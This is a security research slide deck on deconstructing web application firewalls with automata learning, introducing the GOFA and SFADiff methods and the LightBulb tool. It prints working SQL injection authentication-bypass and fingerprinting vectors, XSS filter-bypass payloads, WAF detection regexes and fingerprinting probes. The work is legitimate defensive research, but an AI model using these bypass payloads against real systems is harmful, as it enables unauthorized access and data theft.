Another Brick off The Wall:
Deconstructing Web Application
Firewalls Using Automata Learning
George Argyros, Ioannis Stais
Joint Work with:
Suman Jana, Angelos D. Keromytis, Aggelos Kiayias
Overview
• A journey in the world of:
- Code Injection attacks.
- Web Application Firewalls.
- Parsers.
- Learning algorithms.
• And newly discovered vulnerabilities :)
Code Injection Attacks
• SQLi, XSS, XML, etc…
• Not going anywhere anytime soon.
• 14% increase in total web attacks in
Q2 2016 [1]
• 150% - 200% increase in SQLi and
XSS attacks in 2015 [2]
[1] akamai’s [state of the internet] / security Q2 2016 executive review
[2] Imperva: 2015 Web Application Attack Report (WAAR)
Code Injection is a Parsing
Problem
Web application parsers are doing a really bad
job in parsing user inputs.
Web Application
Language
Runtime
Input data
Input data is parsed
incorrectly
Injection attack
Web Application Firewalls
(or solving parsing problems with parsing)
Web Application Firewalls
• Monitor traffic at the Application
Layer: Both HTTP Requests and
Responses.
• Detect and Prevent Attacks.
• Cost-effective compliance with PCI
DSS requirement 6.6 [1]
[1] PCI DSS v3.2
WAFs Internals
• User Input: <ScRipt>alert(1);</ScRipT>
• Normalization: Lower Case gives <script>alert(1);</script>
• Rulesets Matching: Matched Rule: <script>.*</script>
• Tokenising: 1. <script> 2. alert(1); 3. </script>
• Event Correlation: 1. 4 Rules Matched 2. Session/User history
• Attack Mitigation
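The normalization and matching steps can be sketched in a few lines of Python. This is a minimal illustration, not how any particular WAF is implemented: the one-rule ruleset and the function names are assumptions made for the example.

```python
import re

# Hypothetical one-rule ruleset, taken from the example rule on the slide.
RULES = {"script-tag": re.compile(r"<script>.*</script>")}

def normalize(payload):
    """Normalization step: only lower-casing here, as in the slide example."""
    return payload.lower()

def match_rules(payload):
    """Return the names of all rules that match the normalized payload."""
    normalized = normalize(payload)
    return [name for name, rule in RULES.items() if rule.search(normalized)]

def is_blocked(payload):
    """Mitigation decision: block as soon as at least one rule matches."""
    return bool(match_rules(payload))

print(is_blocked("<ScRipt>alert(1);</ScRipT>"))
print(is_blocked("hello world"))
```

Without the lower-casing step the mixed-case payload would not match the rule, which is why normalization sits in front of the ruleset.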
WAF Rulesets
• Signatures: Strings or Regular Expressions
E.g., [PHPIDS Rule 54] Detects Postgres pg_sleep injection, waitfor delay attacks and
database shutdown attempts:
(?:select\s*pg_sleep)|(?:waitfor\s*delay\s?"+\s?\d)|(?:;\s*shutdown\s*(?:;|--|#|\/\*|{))
WAF Rulesets
• Signatures: Strings or Regular Expressions
• Rules: Logical expressions and Condition/Control Variables
E.g., ModSecurity CRS Rule 981254:
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:select\s*?pg_sleep)|(?:waitfor\s*?delay\s?[\"'`´’‘]+\s?\d)|(?:;\s*?shutdown\s*?(?:;|--|#|\/\*|{)))" "phase:2,capture,t:none,t:urlDecodeUni,block,setvar:tx.sql_injection_score=+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'"
WAF Rulesets
• Signatures: Strings or Regular Expressions
• Rules: Logical expressions and Condition/Control Variables
• Virtual Patches: Application Specific Patches
E.g., ModSecurity: Turns off autocomplete for the forms on login and signup pages
SecRule REQUEST_URI "^(/login|/signup)" "id:1000,phase:4,chain,nolog,pass"
SecRule REQUEST_METHOD "@streq GET" "chain"
SecRule STREAM_OUTPUT_BODY "@rsub s/<form /<form autocomplete=\"off\" /"
WAF Rulesets
• Signatures: Strings or Regular Expressions
• Rules: Logical expressions and Condition/Control Variables
• Virtual Patches: Application Specific Patches
• PHPIDS has more than 420K states
• Shared between different WAFs and Log Auditing Software: PHPIDS,
Expose, ModSecurity
Why Bypasses Exist
Why Bypasses Exist
- Simple hacks:
• Lack of support for different protocols, encodings, contents, etc
• Restrictions on length, character sets, byte ranges, types of
parameters, etc
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
PHPIDS 0.7.0
User Input: x' onclick='a()'>
Normalization: quote variants (’ ” `) are converted to "
Rulesets Matching: "\s*(src|style|on\w+)\s*=\s*")
MATCHED!
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
Expose 2.4.0 (same ruleset, no Normalization step)
User Input: x' onclick='a()'>
Rulesets Matching: "\s*(src|style|on\w+)\s*=\s*")
The rule that MATCHED! in PHPIDS no longer matches.
BYPASS!
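The effect of sharing a ruleset without its normalization step can be reproduced with a short Python sketch. The rule fragment is the one from the slide with its backslashes restored, and the quote normalizer is a hypothetical stand-in for the normalization step; neither is copied from PHPIDS or Expose source code.

```python
import re

# Rule fragment from the slide (backslashes restored, which is an assumption).
RULE = re.compile(r'"\s*(src|style|on\w+)\s*=\s*"')

# Hypothetical normalizer: map several quote variants to a plain double quote.
QUOTE_VARIANTS = "'`\u2018\u2019\u201c\u201d\u00b4"

def normalize_quotes(payload):
    return payload.translate({ord(ch): '"' for ch in QUOTE_VARIANTS})

def matched_with_normalization(payload):
    """Ruleset applied after normalization."""
    return RULE.search(normalize_quotes(payload)) is not None

def matched_without_normalization(payload):
    """Same ruleset applied to the raw input."""
    return RULE.search(payload) is not None

payload = "x' onclick='a()'>"
print(matched_with_normalization(payload))
print(matched_without_normalization(payload))
```

The rule expects double quotes, so it only fires when the single quotes in the payload have been rewritten first.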
Why Bypasses Exist
- Critical WAF components are not being updated:
• E.g., ModSecurity libinjection library
Why Bypasses Exist
- The Real Fundamental Reasons:
• Insufficient Signatures & Weak Rules
• Detecting vulnerabilities without context is HARD
Our Goal
1. Formalize knowledge of code injection attack variations
using context free grammars and automata.
2. Use learning algorithms to expand this knowledge by
inferring system specifications.
Using parsers to
break parsers
Regular Expressions and
Finite Automata
Every regular expression can be converted to a
Deterministic Finite Automaton.
(.*)man
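As an illustration, the DFA for (.*)man can be written out by hand and cross-checked against Python's `re` module. The state numbering below is an assumption of this sketch: a state records how many characters of "man" have been matched at the end of the input read so far.

```python
import re
from itertools import product

def step(state, ch):
    """Transition function of a 4-state DFA for strings ending in "man"."""
    if state == 1 and ch == "a":
        return 2
    if state == 2 and ch == "n":
        return 3
    # Any "m" restarts a potential match; everything else falls back to state 0.
    return 1 if ch == "m" else 0

def accepts(word):
    state = 0
    for ch in word:
        state = step(state, ch)
    return state == 3  # state 3 is the only accepting state

def agrees_with_regex(alphabet="manx", max_len=5):
    """Compare the DFA with re.fullmatch on every short string over a small alphabet."""
    for n in range(max_len + 1):
        for letters in product(alphabet, repeat=n):
            word = "".join(letters)
            if accepts(word) != bool(re.fullmatch(r"(.*)man", word)):
                return False
    return True

print(accepts("batman"), accepts("mandate"), agrees_with_regex())
```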
Context Free Grammars
• Superset of Regular Expressions.
• Mostly used to write programming language parsers.
• Equivalent to a nondeterministic finite automaton with a stack (a pushdown automaton).
• Can be used to count.
- Example: matching parentheses.
E → N
E → E Op E
E → ( E )
N → N N
N → [0-9]
Op → + | - | * | /
Non-terminals: E, N, Op
Terminals: + - * / ( ) and the digits 0-9
Attack of the Grammars
• Context Free Grammars can be used to encode attack vectors.
• Assume we would like to inject code into the query:
- “SELECT * FROM users WHERE id=$id;”
• The valid suffixes (injections) for this query can be encoded as a
CFG!
Cross checking regular expressions with grammars is easy!
Why should I care?
Context Free Grammar G (SQL Injections) vs Regular Expression F (WAF Filter)
Find an SQL Injection attack in the Grammar G
which is not rejected by the filter F
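A brute-force version of this cross-check fits in a short Python sketch. It enumerates every string of a small, non-recursive toy grammar and keeps those the filter does not reject; it is a substitute for a proper grammar/automaton intersection, and both the grammar and the filter below are hypothetical examples, not taken from a real WAF.

```python
import re
from itertools import product

# Toy grammar G (hypothetical): suffixes that extend a WHERE clause.
GRAMMAR = {
    "S": [["1", "cond"]],
    "cond": [["or", "pred"], ["and", "pred"]],
    "pred": [["1", "=", "1"],
             ["exists", "(", "select", "1", ")"],
             ["a", "like", "1"]],
}

# Toy filter F (hypothetical): rejects tautologies of the form "x = x".
FILTER = re.compile(r"\b(\w+)\s*=\s*\1\b")

def expand(symbol):
    """Yield every token list derivable from symbol (the grammar must be non-recursive)."""
    if symbol not in GRAMMAR:
        yield [symbol]  # terminal
        return
    for production in GRAMMAR[symbol]:
        for parts in product(*(list(expand(s)) for s in production)):
            yield [token for part in parts for token in part]

def bypasses():
    """Strings in the language of G that the filter F does not reject."""
    candidates = (" ".join(tokens) for tokens in expand("S"))
    return [c for c in candidates if not FILTER.search(c)]

for attack in bypasses():
    print(attack)
```

For recursive grammars the enumeration would need a depth bound; an exact check would intersect G with the complement of F instead of enumerating.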
However…
• In reality, we do not know the language parsed by most
implementations.
- MySQL is parsing a different SQL flavor than MS-SQL.
- Browsers are definitely not parsing the HTML standard.
- WAFs are doing much more than a simple RE matching.
Learning to Parse
• Our Approach: Use Learning algorithms in order to infer the
specifications of parsers and WAFs.
- Cross check the inferred models for vulnerabilities.
• By using learning we can actively figure out important details of the
systems.
Learning Automata
Learning Automata
• Active Learning algorithm.
- Instead of learning from a corpus of data, the learner queries the program
with inputs of its choice.
• Eventually a model is generated.
• Discovered inconsistencies in the model are used to refine it.
Learning Model
• Membership Query: the Learning Algorithm sends a string s to Parser P and asks “Is s accepted by P?”
• Equivalence Query: the Learning Algorithm sends a Model H to the Equivalence Oracle and asks “Is H a correct model of P?” The oracle answers yes, or provides a counterexample.
Learning DFAs
• Angluin’s algorithm is an active learning algorithm for learning
DFAs.
• Learns the target DFA using a table data structure called the
observation table.
• Let’s use it to learn the regular expression (.*)<a(.*)
- Aggressive filtering of anchor tags.
Learning DFAs
The observation table (OT):
• Columns are strings for “testing” states (distinguishing strings). The first column is the empty string ε.
• The upper rows are strings accessing different states in the target automaton (access strings).
• The lower rows are strings which transition from the above states.
• An entry is filled by concatenating the row and column strings and recording the output of the automaton.
Target: three states, reached by ε, < and <a. State ε loops on a and moves to state < on <. State < loops on < and moves to state <a on a. State <a is accepting and loops on <,a.
Learning DFAs
Step 1: one column (ε).
OT   ε
ε    0    q_0
ε<   0    q_0 trans.
εa   0    q_0 trans.
Model: a single state ε with a loop on a,<.
Equivalence Query
Is the model equal to the target? No. CE: <aaa<<a
Counterexample analysis: add a new column with character “a” in the OT.
Learning DFAs
Step 2: columns ε and a.
OT   ε  a
ε    0  0    q_0
ε<   0  1    q_0 trans. Must be a new state
εa   0  0    q_0 trans.
Learning DFAs
Step 3: ε< becomes state q_1 and its transitions are added.
OT   ε  a
ε    0  0    q_0
ε<   0  1    q_1
εa   0  0    q_0 trans.
ε<   0  1    q_0 trans.
<a   1  1    q_1 trans. Must be a new state
<<   0  1    q_1 trans.
Learning DFAs
Step 4: <a becomes state q_2 and its transitions are added.
OT   ε  a
ε    0  0    q_0
ε<   0  1    q_1
<a   1  1    q_2
εa   0  0    q_0 trans.
ε<   0  1    q_0 trans.
<a   1  1    q_1 trans.
<<   0  1    q_1 trans.
<aa  1  1    q_2 trans.
<a<  1  1    q_2 trans.
The upper rows give the states and the lower rows give the transitions. The resulting model is equal to the target.
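The walk-through can be reproduced with a compact observation-table learner in Python. This is a sketch under stated assumptions: it handles counterexamples by adding every suffix of the counterexample as a column (a common simplification, not the single-column analysis shown on the slides), and it replaces the equivalence oracle with exhaustive testing up to a fixed length.

```python
from itertools import product

ALPHABET = "<a"

def target(word):
    """Membership oracle: the filter (.*)<a(.*) from the slides."""
    return "<a" in word

def row(prefix, suffixes):
    """One row of the observation table."""
    return tuple(target(prefix + e) for e in suffixes)

def build_hypothesis(access, suffixes):
    """Close the table (promote unmatched transition rows to states), then read off a DFA."""
    while True:
        rows = {row(s, suffixes): s for s in access}
        missing = [s + c for s in access for c in ALPHABET
                   if row(s + c, suffixes) not in rows]
        if not missing:
            break
        access.append(missing[0])  # "must be a new state"
    delta = {(s, c): rows[row(s + c, suffixes)] for s in access for c in ALPHABET}
    accepting = {s for s in access if target(s)}
    return delta, accepting

def run(delta, accepting, word):
    state = ""  # states are named by their access strings; "" is the start state
    for c in word:
        state = delta[(state, c)]
    return state in accepting

def find_counterexample(delta, accepting, max_len=6):
    """Stand-in for the equivalence oracle: exhaustive testing up to max_len."""
    for n in range(max_len + 1):
        for letters in product(ALPHABET, repeat=n):
            word = "".join(letters)
            if run(delta, accepting, word) != target(word):
                return word
    return None

def learn():
    access, suffixes = [""], [""]
    while True:
        delta, accepting = build_hypothesis(access, suffixes)
        cex = find_counterexample(delta, accepting)
        if cex is None:
            return access, delta, accepting
        for i in range(len(cex)):  # add every suffix of the counterexample as a column
            if cex[i:] not in suffixes:
                suffixes.append(cex[i:])

access, delta, accepting = learn()
print(access, sorted(accepting))
```

On this target the learner ends with the three access strings ε, < and <a, matching the states q_0, q_1 and q_2 of the final table.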
Learning DFAs
• This algorithm is inefficient for large alphabets/automata.
• For just one PHPIDS Rule (id. 72):
• ((={s}*(top|this|window|content|self|frames|_content))|(/{s}*[gimx]*{s}*[)}])|([^ ]{s}*={s}*script)|(.{s}
*constructor)|(default{s}+xml{s}+namespace{s}*=)|(/{s}*+[^+]+{s}*+{s}*/))
- 72 states when represented as a DFA.
- The OT will have ~650k entries.
• We need a faster algorithm in order to check real systems!
Symbolic Finite Automata
✓ Efficient modeling of large
alphabets.
✓ We designed a novel,
efficient learning algorithm.
✓ Details in the whitepaper!
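To show why symbolic transitions help with large alphabets, here is a minimal Python sketch of an SFA whose transitions carry predicates over characters instead of single symbols. The class and its method names are assumptions made for the illustration and are not the data structure from the whitepaper.

```python
class SFA:
    """Symbolic finite automaton: each transition is guarded by a predicate."""

    def __init__(self, initial, accepting):
        self.initial = initial
        self.accepting = set(accepting)
        self.transitions = {}  # state -> ordered list of (predicate, next_state)

    def add(self, src, predicate, dst):
        self.transitions.setdefault(src, []).append((predicate, dst))

    def accepts(self, word):
        state = self.initial
        for ch in word:
            # The first predicate that holds decides the next state.
            for predicate, dst in self.transitions.get(state, []):
                if predicate(ch):
                    state = dst
                    break
            else:
                return False  # no transition applies
        return state in self.accepting

def build_anchor_filter():
    """SFA for (.*)<a(.*) over the full character set, using six transitions."""
    sfa = SFA(initial=0, accepting=[2])
    sfa.add(0, lambda ch: ch == "<", 1)
    sfa.add(0, lambda ch: True, 0)       # any other character
    sfa.add(1, lambda ch: ch == "<", 1)
    sfa.add(1, lambda ch: ch == "a", 2)
    sfa.add(1, lambda ch: True, 0)       # any other character
    sfa.add(2, lambda ch: True, 2)       # accepting sink
    return sfa

sfa = build_anchor_filter()
print(sfa.accepts("x<<a href"), sfa.accepts("<b a>"))
```

An explicit DFA over the same character set would need one table entry per state and character, whereas the symbolic version stays at six guarded transitions.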
Bootstrapping Automata Learning
• Similar in concept to seed inputs in fuzzers.
- Provide sample inputs and the learning algorithm will
discover additional states in the parser.
• Utilize previously inferred models, specifications, etc.
• Seed inputs guide the learning algorithm.
• Details in the white paper!
Grammar Oriented Filter Auditing
(GOFA)
Grammar Oriented Filter Auditing
• Assume that we are given a grammar with attacks.
• How do we utilize it with the learning algorithm?
Main idea:
Use the grammar to drive the learning procedure.
Grammar Oriented Filter Auditing
Inputs: a Context Free Grammar G and a Learning Algorithm.
…
select_exp: SELECT name
any_all_some: ANY | ALL
column_ref: name
parameter: name
Step 1: Learn a model of the WAF.
Step 2: Find a vulnerability in the model using the grammar (Grammar G vs WAF Model).
Step 3: Verify the WAF vulnerability by testing the Candidate Bypass against the WAF.
Step 4: If the candidate is a counterexample (false positive), refine the model and repeat.
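The four steps can be sketched as a loop in Python. The sketch assumes a finite list of attack strings standing in for grammar G, and it takes the learner and the WAF as plain callables; the function names and the toy learner in the usage lines are hypothetical and only serve to make the loop runnable.

```python
def gofa(attacks, learn_model, waf_blocks, max_rounds=20):
    """Return an attack string that the WAF does not block, or None.

    attacks:     list of strings derived from grammar G (finite here, an assumption)
    learn_model: callable taking the counterexamples seen so far and returning
                 a predicate model_blocks(s)
    waf_blocks:  callable performing a membership query on the real WAF
    """
    counterexamples = []
    for _ in range(max_rounds):
        model_blocks = learn_model(counterexamples)               # Step 1
        candidate = next((s for s in attacks
                          if not model_blocks(s)), None)          # Step 2
        if candidate is None:
            return None        # the model rejects every attack in G
        if not waf_blocks(candidate):                             # Step 3
            return candidate   # verified bypass
        counterexamples.append(candidate)                         # Step 4
    return None

# Toy usage: a deliberately weak learner that only blocks what it was shown,
# and a stand-in WAF that blocks any payload containing "=".
attacks = ["1 or 1 = 1", "1 or a = 1", "1 or exists (select 1)"]
weak_learner = lambda seen: (lambda s: s in seen)
toy_waf = lambda s: "=" in s
print(gofa(attacks, weak_learner, toy_waf))
```

A real learner would generalize from each counterexample, so far fewer rounds would be spent on the WAF than in this toy run.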
Vulnerabilities
GOFA SQL Injections
• Grammar for extending search conditions:
select * from users where user = admin and email = $_GET[c]
GOFA SQL Injections
S: A main

main: search_condition 

search_condition: OR predicate | AND predicate 

predicate: comparison_predicate | between_predicate | like_predicate | test_for_null | in_predicate
| all_or_any_predicate | existence_test

comparison_predicate: scalar_exp comparison scalar_exp | scalar_exp COMPARISON subquery

between_predicate: scalar_exp BETWEEN scalar_exp AND scalar_exp

like_predicate: scalar_exp LIKE atom 

test_for_null: column_ref IS NULL

in_predicate: scalar_exp IN ( subquery ) | scalar_exp IN ( atom ) 

all_or_any_predicate: scalar_exp comparison any_all_some subquery

existence_test: EXISTS subquery

scalar_exp: scalar_exp op scalar_exp | atom | column_ref | ( scalar_exp ) 

atom: parameter | intnum 

subquery: select_exp

select_exp: SELECT name

any_all_some: ANY | ALL | SOME

column_ref: name

parameter: name

intnum: 1

op: + | - | * | / 

comparison: = | < | > 

name: A
GOFA SQL Injections
• Authentication bypass using the vector: or exists (select 1)
Example:
select * from users where username = $_GET['u'] and password = $_GET['p'];
select * from users where username = admin and password = a or exists (select 1)
Affected: ModSecurity Latest CRS, PHPIDS, WebCastellum, Expose
GOFA SQL Injections
• Authentication bypass using the vector: 1 or a = 1
1 or a like 1
Example:
select * from users where username = $_GET['u'] and password = $_GET['p'];
select * from users where username = admin and password = 1 or isAdmin like 1
Affected: ModSecurity Latest CRS, PHPIDS (only for statement with ‘like’),
WebCastellum, Expose
GOFA SQL Injections
• Columns/variables fingerprinting using the vectors: and exists (select a)
a or a > any select a
Example:
select * from users where username = admin and id = $_GET['u'];
select * from users where username = admin and id = 1 and exists (select email)
Affected: ModSecurity Latest CRS, PHPIDS, WebCastellum, Expose
GOFA SQL Injections
• Grammar for extending select queries:
select * from users where user = $_GET[c]
GOFA SQL Injections
S: A main

main: query_exp

query_exp: groupby_exp | order_exp | limit_exp | procedure_exp | into_exp | for_exp |
lock_exp | ; select_exp | union_exp | join_exp

groupby_exp: GROUP BY column_ref ascdesc_exp

order_exp: ORDER BY column_ref ascdesc_exp

limit_exp: LIMIT intnum

into_exp: INTO output_exp intnum

procedure_exp: PROCEDURE name ( literal )

literal: string | intnum

select_exp: SELECT name

union_exp: UNION select_exp

ascdesc_exp: ASC | DESC

column_ref: name

join_exp: JOIN name ON name

for_exp: FOR UPDATE

lock_exp: LOCK IN SHARE MODE

output_exp: OUTFILE | DUMPFILE

string: name

intnum: 1

name: A
GOFA SQL Injections
• Data retrieval bypass using the vector: 1 right join a on a = a
Example:
select * from articles left join authors on author.id=$_GET['id']
select * from articles left join authors on author.id= 1 right join users on author.id =
users.id
Affected: ModSecurity Latest CRS, WebCastellum
GOFA SQL Injections
• Columns/variables fingerprinting using the vectors: a group by a asc
Example:
select * from users where username = $_GET['u'];
select * from users where username = admin group by email asc
Affected: ModSecurity Latest CRS, PHPIDS, WebCastellum, Expose
GOFA SQL Injections
• Columns/variables fingerprinting using the vectors: procedure a (a)
Example:
select * from users where username = $_GET['u'];
select * from users where username = admin procedure analyze()
Affected: libInjection
SFADiff: Learning Attack Vectors
SFADiff
• Available grammars are not always good for finding vulnerabilities.
• Most XSS bypasses result from attack vectors deviating from the HTML
standard.
- <IMG SRC="jav&#x09;ascript:alert('XSS');">
- Tons of other examples.
• Use the same learning approach to infer the HTML parser specification!
SFADiff
• One Automata Learner queries the WAF and infers a WAF model.
• A second Automata Learner queries the Browser and infers an HTML Model.
• The two models are cross-checked (WAF model vs HTML Model) to produce candidate bypasses.
• Candidate bypasses are tested on the real WAF and Browser: those that fail are returned to the learners as counterexamples, the rest are Bypasses.
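The cross-check between two learned models can be illustrated with a breadth-first search over their product automaton, which returns a shortest input the two models classify differently. This Python sketch works on plain DFAs rather than SFAs, and the two toy models below are hypothetical, not learned from a real WAF or browser.

```python
from collections import deque

def shortest_difference(dfa_a, dfa_b, alphabet):
    """Return a shortest word on which the two DFAs disagree, or None if there is none.

    Each DFA is a tuple (start_state, delta, accepting) with delta[(state, char)].
    """
    (start_a, delta_a, acc_a), (start_b, delta_b, acc_b) = dfa_a, dfa_b
    queue = deque([(start_a, start_b, "")])
    seen = {(start_a, start_b)}
    while queue:
        a, b, word = queue.popleft()
        if (a in acc_a) != (b in acc_b):
            return word
        for c in alphabet:
            pair = (delta_a[(a, c)], delta_b[(b, c)])
            if pair not in seen:
                seen.add(pair)
                queue.append((pair[0], pair[1], word + c))
    return None

# Toy model A: accepts strings that contain "<a".
MODEL_A = (0, {(0, "<"): 1, (0, "a"): 0, (1, "<"): 1, (1, "a"): 2,
               (2, "<"): 2, (2, "a"): 2}, {2})
# Toy model B: accepts only strings that start with "<a" (state 3 is a dead state).
MODEL_B = (0, {(0, "<"): 1, (0, "a"): 3, (1, "<"): 3, (1, "a"): 2,
               (2, "<"): 2, (2, "a"): 2, (3, "<"): 3, (3, "a"): 3}, {2})

print(shortest_difference(MODEL_A, MODEL_B, "<a"))
```

Each returned word is only a candidate: it still has to be confirmed on the real systems, and a failed confirmation becomes a counterexample for the learners.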
SFADiff XSS Bypass
• XSS Attack vectors in PHPIDS 0.7/ Expose 2.4.0
<p onmouseover=-a() ></p>
<p onmouseover=(a()) ></p>
<p onmouseover=;a() ></p>
<p onmouseover=!a() ></p>
• Other types of events can also be used for the attack (e.g. "onClick").
• Rules 71, 27, 2 and 65 are related to this insufficient pattern match.
Bonus:
Fingerprinting WAFs
Generating Program Fingerprints
• Which program P_T is running in the Black-box, out of the candidates P_1, P_2, …, P_N?
• SFADiff finds an input causing a difference in P_1, P_2. The response of the black box to that input eliminates one of them, leaving a candidate P_i.
• SFADiff is run again with P_i and the next candidate, giving another input causing a difference and a surviving candidate P_j.
• The process repeats until P_T is identified.
Generating Program Fingerprints
Fingerprint tree: internal nodes are distinguishing inputs, edges are labelled ✔ or ✘, and leaves are WAF versions.
• Distinguishing inputs: “etc/<”, “:%0o”, “:/B”, “%23%0A”, “;”, “etc/,#”, “:et#”
• Leaves: WebCastellum 1.8.4, PHPIDS 0.6.5, PHPIDS 0.5.0, PHPIDS 0.6.4, ModSecurity 2.9.1, PHPIDS 0.6.3, Expose 2.4.0, PHPIDS 0.4.0
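Identifying a black box with such a tree is a simple walk from the root. In the Python sketch below, the tree layout, the probe strings and the WAF names are placeholders chosen for the example; they do not reproduce the tree from the slide.

```python
def identify(tree, is_blocked):
    """Walk a fingerprint tree and return the name stored at the reached leaf.

    An internal node is a tuple (probe, subtree_if_blocked, subtree_if_passed);
    a leaf is a string naming the identified program.
    is_blocked(probe) performs one membership query on the black box.
    """
    node = tree
    while not isinstance(node, str):
        probe, if_blocked, if_passed = node
        node = if_blocked if is_blocked(probe) else if_passed
    return node

# Placeholder tree with two distinguishing inputs and three candidate programs.
TREE = ("probe-1",
        ("probe-2", "WAF-A", "WAF-B"),
        "WAF-C")

# Stand-in black box: blocks probe-1 but lets probe-2 through.
black_box = lambda probe: probe == "probe-1"
print(identify(TREE, black_box))
```

The number of queries sent to the black box equals the depth of the reached leaf, so a balanced tree over N candidates needs about log2(N) requests.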
LightBulb
Modular Design
• Core Modules:
• Use automata models and operations
• Extend the SFA learning algorithm
• Built-in Query Handlers:
• Perform membership queries
• Modules (and Built-in Modules):
• Use the Built-in Query Handlers
• Extend the Core Modules: GOFA, SFADiff
• Library:
• Set of grammars, filters, fingerprints trees and configurations
Core Modules
• Extend SFA Learning algorithm:
• Accept the Alphabet, a Seed and/or a Tests file and a Query handler.
• Initialise learning and manage results and models
• The Alphabet: Set of characters to be used
• The Seed File: Knowledge of what the examined inputs should look like
• The Tests File: Knowledge of specialised attacks
• The Query Handler/Function: Knowledge of how to perform queries for selected
inputs
Core Modules
• GOFA:
• Grammar Oriented Filter Auditing.
• SFADiff:
• A black-box differential testing framework based on Symbolic
Finite Automata (SFA) learning.
Simple Structure: Class with five (5) basic functions:
setup(), learn(), query(), getresults(), stats()
Built-in Query Handlers
• HTTP Request Handler:
• Perform queries on WAF filters and Sanitizers
• SQL Query Handler:
• Perform queries on MySQL Parser
• Browser Parser Handler:
• Perform queries on Browser JavaScript Parsers
• Browser Filter Handler:
• Perform queries on Browser Anti-XSS Filters
HTTP Request Handler
• Targets WAF Filter
• Requires URL, HTTP Request Type, Parameter and Block
or Bypass Signature
Diagram: the GOFA core module initializes the HTTP Request Handler module and sends it a Query. The handler sends HTTP GET /?parameter=Payload to the WAF over the HTTP protocol, checks the response for the Block/Bypass Signature and returns True/False.
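A membership query over HTTP can be sketched with the Python standard library. This is not LightBulb's handler: the function names, the example host and the choice to treat the block signature as a substring of the response body are assumptions of the sketch.

```python
import urllib.error
import urllib.parse
import urllib.request

def build_url(base_url, parameter, payload):
    """Build the GET request URL /?parameter=Payload with the payload URL-encoded."""
    return base_url + "?" + urllib.parse.urlencode({parameter: payload})

def is_blocked(body, block_signature):
    """Decide from the response body whether the WAF blocked the payload."""
    return block_signature in body

def membership_query(base_url, parameter, payload, block_signature, timeout=10):
    """Send one payload through the WAF and return True if it was blocked."""
    url = build_url(base_url, parameter, payload)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as response:
            raw = response.read()
    except urllib.error.HTTPError as error:
        raw = error.read()  # a block page may arrive with an error status code
    return is_blocked(raw.decode("utf-8", errors="replace"), block_signature)

# Hypothetical target; calling membership_query would send a real request.
print(build_url("http://waf.example/", "q", "<a b>"))
```

A bypass signature works the same way with the result inverted: the payload counts as blocked when the expected marker is missing from the response.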
MySQL Query Handler
• Targets MySQL Database Parser
• Requires Database Credentials
• Requires Prefix Query: e.g., “SELECT a FROM a WHERE a=**”
Diagram: the GOFA core module initializes the SQL Handler module and sends it a Query. The handler sends Prefix Query + Payload to the MySQL database through the MySQL DB driver, receives a Result or Empty and returns True/False.
Browser Parser Handler
• Targets the Browser HTML and JavaScript Parsing Engine
• Requires web sockets port, web browser port, host and trigger delay
• Inputs must trigger function a() (e.g., <script>a();</script>)
Diagram: the GOFA core module initializes the Browser Handler module and sends it a Query. The handler runs a Web Server and a Web Socket Server and talks to the web browser over the HTTP protocol and WebSockets: the browser fetches the HTML page containing the Payload with an HTTP GET, and True/False is reported back to the handler.
Browser Filter Handler
• Targets the Browser Anti-XSS Filter, HTML and JavaScript Parsing Engine
Diagram: the GOFA core module initializes the Browser Filter Handler module and sends it a Query. The handler runs a Web Server and a Web Socket Server and talks to the web browser over the HTTP protocol, WebSockets and Cross Origin Message Events: the HTML page in the browser loads the query in an IFRAME with HTTP GET /?parameter=Payload, and True/False is reported back to the handler.
Using GOFA module and HTTP Handler
use HTTPHandler as my_query_handler
define URL http://83.212.105.5/PHPIDS07/
define BLOCK impact
back
Query Handler was created. We can now perform membership requests.
use GOFA as my_gofa
define TESTS_FILE {library}/regex/PHPIDS070/12.y
define HANDLER my_query_handler
back
Algorithm was selected and populated. Now we can learn application states.
start my_gofa
Built-in Modules
• WAF Fingerprints Tree Generator:
• Automatically generates a fingerprints tree for a set of WAFs
• WAF Distinguisher:
• Identifies a WAF using a set of fingerprints trees
• Model Operations:
• Perform automata operations on stored models, input filters and
grammars
• Browser and WAF Differential Testing:
• Queries both Browser and WAF using a predefined set of strings
Built-in Rulesets Library
• Regular Expressions
• Set of WAF filters, and attack models in the form of regular
expressions
• Grammars:
• Set of grammars that can be used for GOFA algorithm.
• Fingerprints Trees:
• Set of fingerprints trees for a predefined number of WAFs.
• Configurations:
• Sample configurations for WAF distinguish tree generation
Grab LightBulb:
https://github.com/lightbulb-framework/
Future Work
• Currently building many optimizations.
- Learning will be much faster in the coming months.
- Cross checking models is also getting better.
• Incorporate fuzzers to improve models.
• New ideas?
Conclusions
• Current state of WAFs is still (very) ugly.
- Plenty of low-hanging fruit.
• Our vision is to enforce a standard for such products.
- WAFs must effectively defend against inferred language specifications.
- Learning can run continuously with the assistance of fuzzers.
• We have a similar line of work on sanitizers.